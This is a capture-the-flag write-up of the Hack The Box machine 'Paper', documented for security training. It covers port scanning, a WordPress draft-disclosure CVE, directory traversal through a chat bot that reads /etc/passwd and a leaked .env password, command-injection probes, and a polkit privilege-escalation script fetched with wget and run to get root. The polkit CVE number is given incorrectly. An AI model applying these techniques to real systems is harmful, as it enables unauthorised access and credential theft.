┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.11.143
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
| 256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_ 256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-title: HTTP Server Test Page powered by CentOS
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: 400 Bad Request
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after: 2022-07-08T10:32:34
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.16 (93%), Linux 3.18 (93%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 5.1 (93%), Oracle VM Server 3.4.2 (Linux 4.1) (93%), Android 4.1.1 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.11.143
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
| 256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_ 256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-title: HTTP Server Test Page powered by CentOS
| http-methods:
|_ Potentially risky methods: TRACE
443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after: 2022-07-08T10:32:34
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| http-methods:
|_ Potentially risky methods: TRACE
nmap finds three open TCP ports, SSH (22), HTTP (80), and HTTPS (443):
Based on the Apache version, the host is likely running Centos 8. There’s a TLS certificate, but it just has localhost.localdomain, which isn’t interesting. The HTTP port and the HTTPS port seem to be the same.
Enumeration: HTTPS
Enumeration: HTTP
WAP:
Web servers
Apache HTTP Server 2.4.37
Operating systems
CentOS
Web server extensions
OpenSSL 1.1.1k
SOURCE CODE:
view-source:http://10.10.11.143/
BURP:
Surprisingly, the default page doesn’t load as index.html on either port. One interesting note is that that default page is coming back with an HTTP 403 Forbidden response (and not a 200 OK). Not sure that means anything, but interesting.
Subdomain Fuzz:
Knowing that there are different DNS names in use, I’ll fuzz for subdomains using wfuzz. I’ll start this without any filtering, and see the the default case is 199691 characters. I’ll kill it, and restart with --hh 199691. It finds one additional subdomain:
The HTTPS site for office.paper returns the same default page. But the HTTP site has a new page for a paper company, Blunder Tiffin:
This is a clearly a play on the company from the TV show “The Office”, which focuses on a paper company called Dunder Mifflin.
There are three posts, all by Prisonmike, and all a similar character to the dumb boss like on the TV show. There is one comment on one of the posts that has a hint:
I’ll make sure to check out draft posts if I can find access.
Hey-o, everyone out there in SyberWorld. It,s old Creed Bratton coming at your again, here from my perch as a Quality Assurance Manager at Blunder Tiffin paper. Just a few observations on the world around me.
What do you guys think is the best kind of car? To me, you can,t beat motorcycles. They’re small and dangerous. They just can’t be trusted.
wpscan
I’ll run wpscan to identify WordPress issues using wpscan --url http://office.paper --api-token $WPSCAN_API. To scan for vulnerabilities, I need to use an API token, which I got for free at the wpscan site. I store my API token in the Bash environment variable $WPSCAN_API with this line in my ~/.bashrc file:
wpscan finds the WP version is 5.2.3:
There are 32 known vulnerabilities in this version, but one towards the top jumps out given the mention of drafts earlier:
This site is an instance of rocket.chat, and open source communications platform:
Under the login button there’s a custom bit of text that says the registration URL is hidden. I’ll try some basic credendial guessing, but nothing logs in. I don’t see any interesting vulnerabilities in rocket.chat.
Shell as dwight
Access rocket.chat
CVE-2019-17671
This post breaks down how vulnerable WordPress versions could be exploited via CVE-2019-17671 to view draft, password protected, and private posts. It’s a mistake in how WordPress handles displaying a mix of draft and published posts when viewed with ?static=1. The if the first post returned is public, then all the posts will be dumped to the page. There are ways to reorder the result, but here it just works without any additional tricks by visiting:
http://office.paper/?static=1
Secret Registration URL of new Employee chat system
There is a private link to access rocket chat registration.
Register for Chat:
At that link, it provides a registration form:
exodus
info@x.com
password123
The next page asks me to pick a username:
exodus
And on clicking “Use this username” I’m in the chat:
recyclops:
Discover
The #general channel has a bunch of characters from the TV show, and some good jokes, but also a bit about Dwight programming a bot:
recyclops help
3. Files:
eg: 'recyclops get me the file test.txt', or 'recyclops could you send me the file src/test.php' or just 'recyclops file test.txt'
4. List:
You can ask me to list the files
We can also send Direct Messages to recyclops!
The most interesting points:
recyclops help will show the commands
recyclops can get files and list files
this channel is read only
recyclops can be reached by DM (direct message).
Listing Files
I’ll open a DM to recyclops, and try to list files:
It shows the contents of /sales/. If I give it a valid directory, it returns the contents of that directory. But if I give it an invalid path, it errors, and gives the full path:
list
Bot
8:03 AM
Fetching the directory listing of /sales/
total 0
drwxr-xr-x 4 dwight dwight 32 Jul 3 2021 .
drwx------ 11 dwight dwight 281 Feb 6 2022 ..
drwxr-xr-x 2 dwight dwight 27 Sep 15 2021 sale
drwxr-xr-x 2 dwight dwight 27 Jul 3 2021 sale_2
8:03 AM
list sale
Bot
8:03 AM
Fetching the directory listing of sale
total 4
drwxr-xr-x 2 dwight dwight 27 Sep 15 2021 .
drwxr-xr-x 4 dwight dwight 32 Jul 3 2021 ..
-rw-r--r-- 1 dwight dwight 158 Sep 15 2021 portfolio.txt
This command is vulnerable to directory traversal:
list ../../..
Bot
8:04 AM
Fetching the directory listing of ../../..
total 28
dr-xr-xr-x. 17 root root 244 Jan 17 2022 .
dr-xr-xr-x. 17 root root 244 Jan 17 2022 ..
-rw-r--r-- 1 root root 0 Jan 14 2022 .autorelabel
lrwxrwxrwx 1 root root 7 Jun 22 2021 bin -> usr/bin
dr-xr-xr-x. 4 root root 4096 Jan 14 2022 boot
drwxr-xr-x 20 root root 3020 Jan 23 05:25 dev
drwxr-xr-x. 145 root root 8192 Jan 23 05:25 etc
drwxr-xr-x. 3 root root 20 Jan 14 2022 home
lrwxrwxrwx 1 root root 7 Jun 22 2021 lib -> usr/lib
lrwxrwxrwx. 1 root root 9 Jun 22 2021 lib64 -> usr/lib64
drwxr-xr-x. 2 root root 6 Jun 22 2021 media
drwxr-xr-x. 3 root root 18 Jun 22 2021 mnt
drwxr-xr-x. 3 root root 25 Jun 22 2021 opt
dr-xr-xr-x 264 root root 0 Jan 23 05:25 proc
dr-xr-x---. 8 root root 4096 Jan 23 05:25 root
drwxr-xr-x 44 root root 1200 Jan 23 05:35 run
lrwxrwxrwx 1 root root 8 Jun 22 2021 sbin -> usr/sbin
drwxr-xr-x. 2 root root 6 Jun 22 2021 srv
dr-xr-xr-x 13 root root 0 Jan 23 05:25 sys
drwxrwxrwt. 10 root root 4096 Jan 23 06:54 tmp
drwxr-xr-x. 13 root root 158 Jan 14 2022 usr
drwxr-xr-x. 22 root root 4096 Jan 14 2022 var
It seems hardened against command injection:
list ../;id
list $(id)
list && id
lit || id
Read Files:
The bot can show file content:
file sale/portfolio.txt
Bot
8:10 AM
<!=====Contents of file sale/portfolio.txt=====>
Portfolio
----------
- Bill
- Served the country in war
- Family built the country
- purchased paper worth a million dollars
- will probably fire me.
<!=====End of file sale/portfolio.txt=====>
The directory traversal vulnerability is present in this command as well. file ../../../etc/passwd shows the contents of that file:
file ../../../etc/passwd
Bot
8:07 AM
<!=====Contents of file ../../../etc/passwd=====>
root❌0:0:root:/root:/bin/bash
bin❌1:1:bin:/bin:/sbin/nologin
daemon❌2:2:daemon:/sbin:/sbin/nologin
adm❌3:4:adm:/var/adm:/sbin/nologin
lp❌4:7:lp:/var/spool/lpd:/sbin/nologin
sync❌5:0:sync:/sbin:/bin/sync
shutdown❌6:0:shutdown:/sbin:/sbin/shutdown
halt❌7:0:halt:/sbin:/sbin/halt
mail❌8:12:mail:/var/spool/mail:/sbin/nologin
operator❌11:0:operator:/root:/sbin/nologin
games❌12games:/usr/games:/sbin/nologin
ftp❌14:50:FTP User:/var/ftp:/sbin/nologin
nobody❌65534:65534:Kernel Overflow User:/:/sbin/nologin
dbus❌81:81:System message bus:/:/sbin/nologin
systemd-coredump❌999:997:systemd Core Dumper:/:/sbin/nologin
systemd-resolve❌193:193:systemd Resolver:/:/sbin/nologin
tss❌59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
polkitd❌998:996:User for polkitd:/:/sbin/nologin
geoclue❌997:994:User for geoclue:/var/lib/geoclue:/sbin/nologin
rtkit❌172:172:RealtimeKit:/proc:/sbin/nologin
qemu❌107:107:qemu user:/:/sbin/nologin
apache❌48:48:Apache:/usr/share/httpd:/sbin/nologin
cockpit-ws❌996:993:User for cockpit-ws:/:/sbin/nologin
pulse❌171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
usbmuxd❌113:113:usbmuxd user:/:/sbin/nologin
unbound❌995:990:Unbound DNS resolver:/etc/unbound:/sbin/nologin
rpc❌32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
gluster❌994:989:GlusterFS daemons:/run/gluster:/sbin/nologin
chrony❌993:987::/var/lib/chrony:/sbin/nologin
libstoragemgmt❌992:986:daemon account for libstoragemgmt:/var/run/lsm:/sbin/nologin
saslauth❌991:76:Saslauthd user:/run/saslauthd:/sbin/nologin
dnsmasq❌985:985:Dnsmasq DHCP and DNS server:/var/lib/dnsmasq:/sbin/nologin
radvd❌75:75:radvd user:/:/sbin/nologin
clevis❌984:983:Clevis Decryption Framework unprivileged user:/var/cache/clevis:/sbin/nologin
pegasus❌66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
sssd❌983:981:User for sssd:/:/sbin/nologin
colord❌982:980:User for colord:/var/lib/colord:/sbin/nologin
rpcuser❌29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
setroubleshoot❌981:979::/var/lib/setroubleshoot:/sbin/nologin
pipewire❌980:978:PipeWire System Daemon:/var/run/pipewire:/sbin/nologin
gdm❌42:42::/var/lib/gdm:/sbin/nologin
gnome-initial-setup❌979:977::/run/gnome-initial-setup/:/sbin/nologin
insights❌978:976:Red Hat Insights:/var/lib/insights:/sbin/nologin
sshd❌74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
avahi❌70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
tcpdump❌72:72::/:/sbin/nologin
mysql❌27:27:MySQL Server:/var/lib/mysql:/sbin/nologin
nginx❌977:975:Nginx web server:/var/lib/nginx:/sbin/nologin
mongod❌976:974:mongod:/var/lib/mongo:/bin/false
rocketchat❌1001:1001::/home/rocketchat:/bin/bash
dwight❌1004:1004::/home/dwight:/bin/bash
<!=====End of file ../../../etc/passwd=====>
root❌0:0:root:/root:/bin/bash
rocketchat❌1001:1001::/home/rocketchat:/bin/bash
dwight❌1004:1004::/home/dwight:/bin/bash
I’ll note that dwight and rocketchat are the only users on the box not in the system/service range below 1000.
Leak Credentials:
In ../hubot there’s a NodeJS project:
The .env file is immediately interesting, as those files tend to hold secrets for the project:
file ../hubot/.env
Bot
8:16 AM
<!=====Contents of file ../hubot/.env=====>
export ROCKETCHAT_URL='http://127.0.0.1:48320'
export ROCKETCHAT_USER=recyclops
export ROCKETCHAT_PASSWORD=Queenofblad3s!23
export ROCKETCHAT_USESSL=false
export RESPOND_TO_DM=true
export RESPOND_TO_EDITED=true
export PORT=8000
export BIND_ADDRESS=127.0.0.1
<!=====End of file ../hubot/.env=====>
SSH:
Given the access to files in /home/dwight, it makes sense that the bot is running as dwight. It’s worth checking if dwight shared their password across rocketchat and the system. crackmapexec shows it works:
Note: It’s important to put that password in single quotes and not double quotes, or Bash will interpret !23 as the command run 23 commands ago in the current sessions history.
LinPEAS:
In general, I like to enumeration manually before breaking out enumeration scripts because it provides good practice of knowing the things to look for. That said, on this one, after a looking around on my own, I didn’t see much of interest.
Build
I could grab the latest release from the releases page, but there’s also a builder I can use. I’ll clone the repo onto my computer (git clone https://github.com/carlospolop/PEASS-ng), and then go into the PEASS-ng/linPEAS directory.
From there, I’ll call the builder script with python3 -m builder.linpeas_builder. This is going to run linpeas_builder from the builder directory, which builds a .sh script:
Polkit CVE:
CVE-2021-3650 is a vulnerability in polkit discovered by Keven Backhouse of the GitHub Security Lab. This attack is a timing attack against polkit, and by killing the process at the right time, it ends up skipping the authentication and allow actions such as creating an account with sudo privs and setting the password..
The author of Paper happens to have a script for this exploit on their GitHub. I’ll save a copy on my VM, and start a webserver in that directory (python3 -m http.server 80). Then I’ll fetch the script with wget to Paper:
┌──(kali💀kali)-[~/Desktop]
└─$ python3 -m http.server 80
[dwight@paper ~]$ wget 10.10.16.16/poc.sh
--2024-01-23 08:32:15-- http://10.10.16.16/poc.sh
Connecting to 10.10.16.16:80... connected.
HTTP request sent, awaiting response...
200 OK
poc.sh 100%[===============================>] 9.40K --.-KB/s in 0.04s
Now I just run it:
[dwight@paper ~]$ bash poc.sh
[!] Username set as : secnigma
[!] No Custom Timing specified.
[!] Timing will be detected Automatically
[!] Force flag not set.
[!] Vulnerability checking is ENABLED!
[!] Starting Vulnerability Checks...
[!] Checking distribution...
[!] Detected Linux distribution as "centos"
[!] Checking if Accountsservice and Gnome-Control-Center is installed
[+] Accounts service and Gnome-Control-Center Installation Found!!
[!] Checking if polkit version is vulnerable
[+] Polkit version appears to be vulnerable!!
[!] Starting exploit...
[!] Inserting Username secnigma...
Error org.freedesktop.Accounts.Error.PermissionDenied: Authentication is required
[+] Inserted Username secnigma with UID 1005!
[!] Inserting password hash...
[!] It looks like the password insertion was succesful!
[!] Try to login as the injected user using su - secnigma
[!] When prompted for password, enter your password
[!] If the username is inserted, but the login fails; try running the exploit again.
[!] If the login was succesful,simply enter 'sudo bash' and drop into a root shell!
[dwight@paper ~]$ su - secnigma
Password:
It might not work every time, but running it repeatedly will eventually work. I’ll change user to the secnigma user with the password secnigmaftw (from the README.md on GitHub):
[dwight@paper ~]$ su secnigma
Password: secnigmaftw
[dwight@paper ~]$ sudo bash
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for dwight: Queenofblad3s!23
dwight is not in the sudoers file. This incident will be reported.
Now this user is in the wheel group:
[secnigma@paper ~]$ id
uid=1005 gid=1005 groups=1005,10(wheel)
This group allows members to run sudo. I’ll need the password again, but it works:
[dwight@paper tmp]$ su - secnigma
[dwight@paper tmp]$ bash poc.sh
[dwight@paper tmp]$ su - secnigma
Password: secnigmaftw
[secnigma@paper ~]$ sudo su -
[sudo] password for secnigma: secnigmaftw
[root@paper ~]# cat /root/root.txt
97286------------------------------
